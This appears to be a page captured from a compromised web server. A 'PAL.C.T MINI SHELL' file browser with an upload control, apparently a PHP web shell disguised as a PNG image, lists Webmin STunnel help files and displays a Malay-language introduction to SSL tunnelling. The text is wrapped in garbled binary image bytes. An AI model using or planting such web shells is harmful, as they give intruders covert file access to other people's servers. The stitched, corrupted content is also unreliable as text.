php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /usr/libexec/webmin/stunnel/help/
upload
files >> //usr/libexec/webmin/stunnel/help/intro.ms.auto.html

<header> Pengenalan Terowong SSL </header> SSL adalah protokol untuk mengenkripsi data dalam sambungan TCP ketika bergerak melalui rangkaian. Awalnya dikembangkan untuk melindungi lalu lintas antara pelayar web dan pelayan, tetapi dapat digunakan untuk mengenkripsi aliran data apa pun yang biasanya akan dikirim melalui protokol TCP. <p> Protokol SSL membolehkan klien dan pelayan mengesahkan diri antara satu sama lain, supaya pelanggan dapat memastikan bahawa ia benar-benar menyambung ke host yang difikirkannya. Ini dilakukan dengan menggunakan sijil yang dikeluarkan oleh pihak berkuasa sijil yang diakui oleh pelanggan (supaya dapat disahkan) dan dikaitkan dengan nama host tertentu. Tanpa sijil, penyerang dapat mengarahkan semula sambungan SSL ke pelayannya sendiri dan menangkap maklumat sensitif dari pelanggan yang menganggapnya sedang bercakap dengan pelayan yang sebenarnya. <p> Segala data yang melintasi Internet tanpa enkripsi dapat ditangkap dan dibaca oleh penyerang dengan akses ke salah satu rangkaian yang dilaluinya. Bahkan data yang bergerak antara sistem pelanggan dan pelayan di LAN dapat didengarkan dengan mudah. Apabila anda menyambung ke pelayan telnet, FTP atau POP3 kata laluan anda dihantar melalui rangkaian dan dengan itu dapat ditangkap oleh penyerang. <p> SSL dapat digunakan untuk melindungi data dalam situasi seperti ini, tetapi hanya jika klien dan pelayan mendukungnya. Sebilangan besar penyemak imbas web dan pelanggan mel dapat membuat sambungan HTTP, POP3 dan IMAP yang disulitkan SSL, tetapi tidak semua pelayan web dan POP3 dapat menerimanya. POP3 khususnya sukar dilindungi, kerana pelayan standard yang disertakan dengan kebanyakan sistem Unix sama sekali tidak menyokong SSL. Nasib baik walaupun ada jalan penyelesaian - STunnel. <p> STunnel adalah program sederhana yang mengubah sambungan yang tidak disulitkan menjadi yang disulitkan SSL. Ia biasanya disiapkan untuk dijalankan dari pelayan super seperti inetd atau xinetd, dan kemudian jalankan beberapa program lain seperti pelayan POP3 yang tidak menyokong SSL. Reka bentuk ini memungkinkan untuk melindungi mana-mana pelayan yang biasanya dijalankan dari inetd, seperti pelayan telnet, NNTP dan IMAP. <p> Tidak semua pelayan dapat dilindungi dengan enkripsi, kerana tidak ada klien yang menggunakannya untuk mod SSL. Sebagai contoh, saya tidak pernah mendengar pelanggan telnet atau FTP yang dapat menggunakan SSL, kerana pakej SSH yang biasa sudah membolehkan pemindahan log masuk dan pemindahan fail jauh yang dienkripsi. <p> Modul Webmin ini memudahkan penyediaan perkhidmatan pelayan super yang menjalankan STunnel untuk memulakan beberapa program pelayan. Walaupun ini dapat dilakukan secara manual menggunakan modul Perkhidmatan Internet, yang ini secara khusus dirancang untuk mengatur dan mengkonfigurasi STunnel. Ia secara automatik mengesan jika anda telah memasang inetd dan / atau xinetd, membaca konfigurasi mereka untuk memeriksa terowong SSL yang ada dan menambahkannya semasa anda membuat terowong baru. Sekiranya kedua-duanya dipasang, terowong SSL baru akan ditambahkan ke konfigurasi xinetd kerana ini adalah yang unggul dari keduanya pada pendapat saya. <p><hr>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`